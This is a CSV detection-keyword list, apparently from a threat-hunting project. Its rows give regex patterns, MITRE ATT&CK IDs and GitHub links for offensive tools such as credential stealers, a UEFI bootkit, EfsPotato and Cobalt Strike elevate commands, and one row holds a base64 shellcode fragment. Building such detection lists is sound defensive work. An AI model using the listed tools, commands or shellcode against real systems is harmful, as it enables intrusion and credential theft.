"*efbglgofoippbgcjepnhiblaibcnclgk*",".{0,1000}efbglgofoippbgcjepnhiblaibcnclgk.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*efchatz/pandora*",".{0,1000}efchatz\/pandora.{0,1000}","offensive_tool_keyword","pandora","A red team tool that assists into extracting/dumping master credentials and/or entries from different password managers","T1555 - T1003","TA0006 - TA0003","N/A","N/A","Credential Access","https://github.com/efchatz/pandora","1","1","N/A","10","6","533","73","2024-04-30T18:44:57Z","2023-11-03T18:01:31Z" "*eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414*",".{0,1000}eff1f6144cbc0b092a09dc06009fc3709c937347d9b5991560588204fc183414.{0,1000}","offensive_tool_keyword","KerberOPSEC","OPSEC safe Kerberoasting in C#","T1558.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/Luct0r/KerberOPSEC","1","0","N/A","10","2","185","22","2022-06-14T18:10:25Z","2022-01-07T17:20:40Z" "*effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28*",".{0,1000}effc137c4e7594fc3b3b5240c786ba3351e521bb7f9d14883dca6ff9db5f5f28.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*EfiDSEFix.exe *",".{0,1000}EfiDSEFix\.exe\s.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EFIGUARD_BACKDOOR_VARIABLE_NAME*",".{0,1000}EFIGUARD_BACKDOOR_VARIABLE_NAME.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.1.zip*",".{0,1000}EfiGuard\-v1\.1\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.2.zip*",".{0,1000}EfiGuard\-v1\.2\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.3.zip*",".{0,1000}EfiGuard\-v1\.3\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.4.zip*",".{0,1000}EfiGuard\-v1\.4\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfiGuard-v1.5.zip*",".{0,1000}EfiGuard\-v1\.5\.zip.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" "*EfsPotato-*.exe*",".{0,1000}EfsPotato\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*EfsPotato*efsrpc*",".{0,1000}EfsPotato.{0,1000}efsrpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*lsarpc*",".{0,1000}EfsPotato.{0,1000}lsarpc.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege 
Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*lsass*",".{0,1000}EfsPotato.{0,1000}lsass.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*netlogon*",".{0,1000}EfsPotato.{0,1000}netlogon.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato*samr*",".{0,1000}EfsPotato.{0,1000}samr.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EfsPotato-main*",".{0,1000}EfsPotato\-main.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*EgeBalci/amber@latest*",".{0,1000}EgeBalci\/amber\@latest.{0,1000}","offensive_tool_keyword","exegol","Fully featured and 
community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*EggShell.py*",".{0,1000}EggShell\.py.{0,1000}","offensive_tool_keyword","Eggshell","EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own","T1027 - T1553 - T1003 - T1059 - T1558.001","TA0002 - TA0006 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/neoneggplant/EggShell","1","1","N/A","N/A","10","1613","385","2021-03-25T22:04:52Z","2015-07-02T16:58:30Z" "*egjidjbpglichdcondbcbdnbeeppgdph*",".{0,1000}egjidjbpglichdcondbcbdnbeeppgdph.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*Egress-Assess Exfil Data*",".{0,1000}Egress\-Assess\sExfil\sData.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email 
subject","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess Report*",".{0,1000}Egress\-Assess\sReport.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess transfer share*",".{0,1000}Egress\-Assess\stransfer\sshare.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*EgressAssess With Attachment*",".{0,1000}EgressAssess\sWith\sAttachment.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","email body","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess.*",".{0,1000}Egress\-Assess\..{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration 
simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*EgressAssess.ps1*",".{0,1000}EgressAssess\.ps1.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*Egress-Assess-master*",".{0,1000}Egress\-Assess\-master.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*egressbuster*",".{0,1000}egressbuster.{0,1000}","offensive_tool_keyword","egressbuster","EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.","T1046 - T1570 - T1590","TA0001 - TA0007","N/A","N/A","Exploitation tools","https://github.com/trustedsec/egressbuster","1","1","N/A","N/A","4","336","102","2021-02-17T00:54:07Z","2015-05-14T02:19:26Z" "*egresscheck-framework*",".{0,1000}egresscheck\-framework.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EgressCheck.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj*",".{0,1000}EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQj.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","calc base64 shellcode","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" 
"*eigblbgjknlfbajkfhopmcojidlgcehm*",".{0,1000}eigblbgjknlfbajkfhopmcojidlgcehm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ejabberd2john.py*",".{0,1000}ejabberd2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*ejbalbakoplchlghecdalmeeeajnimhm*",".{0,1000}ejbalbakoplchlghecdalmeeeajnimhm.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ejjladinnckdgjemekebdpeokbikhfci*",".{0,1000}ejjladinnckdgjemekebdpeokbikhfci.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*eKeys\*-eKeys.txt*",".{0,1000}eKeys\\.{0,1000}\-eKeys\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. 
Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*eldraco/domain_analyzer*",".{0,1000}eldraco\/domain_analyzer.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 - T1590 - T1200 - T1213 - T1057","TA0002 - TA0009","N/A","N/A","Information Gathering","https://github.com/eldraco/domain_analyzer","1","1","N/A","6","10","1835","245","2022-12-29T10:57:33Z","2017-08-08T18:52:34Z" "*electrum2john.py*",".{0,1000}electrum2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*elevate juicypotato *",".{0,1000}elevate\sjuicypotato\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*elevate Printspoofer*",".{0,1000}elevate\sPrintspoofer.{0,1000}","offensive_tool_keyword","cobaltstrike","Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crisprss/PrintSpoofer","1","0","N/A","10","10","84","10","2021-10-07T17:45:00Z","2021-10-07T17:28:45Z" "*elevate svc-exe *",".{0,1000}elevate\ssvc\-exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an 
advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*ElevatePrivs*",".{0,1000}ElevatePrivs.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*elevationstation.cpp*",".{0,1000}elevationstation\.cpp.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation.exe*",".{0,1000}elevationstation\.exe.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation.git*",".{0,1000}elevationstation\.git.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation.sln*",".{0,1000}elevationstation\.sln.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevationstation-main*",".{0,1000}elevationstation\-main.{0,1000}","offensive_tool_keyword","elevationstation","elevate to SYSTEM any way we can! 
Metasploit and PSEXEC getsystem alternative","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","4","332","47","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z" "*elevator.exe *cmd.exe*",".{0,1000}elevator\.exe\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","Elevator","UAC bypass by abusing RPC and debug objects.","T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Kudaes/Elevator","1","0","N/A","10","6","589","68","2023-10-19T08:51:09Z","2022-08-25T21:39:28Z" "*ElevenPaths*FOCA*",".{0,1000}ElevenPaths.{0,1000}FOCA.{0,1000}","offensive_tool_keyword","FOCA","FOCA is a tool used mainly to find metadata and hidden information in the documents it scans. These documents may be on web pages. and can be downloaded and analysed with FOCA.It is capable of analysing a wide variety of documents. with the most common being Microsoft Office. Open Office. or PDF files. although it also analyses Adobe InDesign or SVG files. for instance.","T1556 - T1566 - T1213 - T1212 - T1565","TA0005 - TA0009","N/A","N/A","Information Gathering","https://github.com/ElevenPaths/FOCA","1","0","N/A","N/A","10","2752","529","2022-12-08T09:31:55Z","2017-10-02T17:05:06Z" "*ELFLoader.c*",".{0,1000}ELFLoader\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. 
